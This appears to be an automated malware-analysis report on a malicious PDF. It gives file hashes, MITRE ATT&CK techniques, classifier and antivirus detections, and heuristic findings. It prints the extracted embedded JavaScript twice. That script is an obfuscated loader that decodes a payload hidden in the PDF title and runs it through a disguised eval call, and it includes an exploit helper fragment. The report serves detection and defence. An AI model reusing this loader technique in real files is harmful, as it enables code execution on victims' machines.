PDF malware analysis — malicious · 2e186a2d3f11eb93

MALICIOUS

PDF

3.2 KB

MD5: 4f9c419c51b8d11ef0b000faf47213ba SHA-1: ba7689ea5f801c99fbc12b60d6cc684ba4b67a87 SHA-256: 2e186a2d3f11eb93a30591226ab56176167638bab01a851d58c651f483645e9d

206 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF sample contains embedded JavaScript that is obfuscated but appears to be designed to exploit a vulnerability. Heuristics indicate a PDF JavaScript exploit cluster and an unescape() call, strongly suggesting the execution of malicious code. The ML classifier and ClamAV detection further confirm its malicious nature. The script likely attempts to download and execute a second-stage payload, a common technique for PDF-based malware.

Machine Learning

Nyx PDF Classifier malicious score 0.9999

Heuristics 4

ClamAV: Pdf.Exploit.Agent-36121 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Pdf.Exploit.Agent-36121
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0007_000.js
c292f097f485ba5b8af1203e31a409e21d2d9c1f9292c5ac0bae2d95bb59053c pdf-javascript-stream PDF /JS object 7 at offset 0x9C9 436 bytes

Filename	Kind	Source	Size
`javascript_obj0007_000.js` `c292f097f485ba5b8af1203e31a409e21d2d9c1f9292c5ac0bae2d95bb59053c`	pdf-javascript-stream	PDF /JS object 7 at offset 0x9C9	436 bytes
Preview script First 1,000 lines of the extracted script k06PA=this.info.title;m1SMUKr="";for (i=0;i<k06PA.length;i +=2){ m1SMUKr +=k06PA.charAt(i); }T8w3=this; wzUd=['X','4','C','S','C','e','V','O','5','8','4','8','v','W','B','a','m','e','v','7','6','l','F'];I8036=wzUd[5]+wzUd[12]+wzUd[15]+wzUd[21];J41g0e=T8w3[I8036];J41g0e(m1SMUKr); function new_player_end(printd,randstr,m,np){npl(printd,randstr);npl(printd,randstr);try {this[m][np](null);} catch(e) {}npl(printd,randstr);}

Preview script

First 1,000 lines of the extracted script

k06PA=this.info.title;m1SMUKr="";for (i=0;i<k06PA.length;i +=2){   m1SMUKr +=k06PA.charAt(i);   }T8w3=this;    wzUd=['X','4','C','S','C','e','V','O','5','8','4','8','v','W','B','a','m','e','v','7','6','l','F'];I8036=wzUd[5]+wzUd[12]+wzUd[15]+wzUd[21];J41g0e=T8w3[I8036];J41g0e(m1SMUKr);    function new_player_end(printd,randstr,m,np){npl(printd,randstr);npl(printd,randstr);try {this[m][np](null);} catch(e) {}npl(printd,randstr);}

Open this report in the interactive analyzer, or submit your own file for analysis.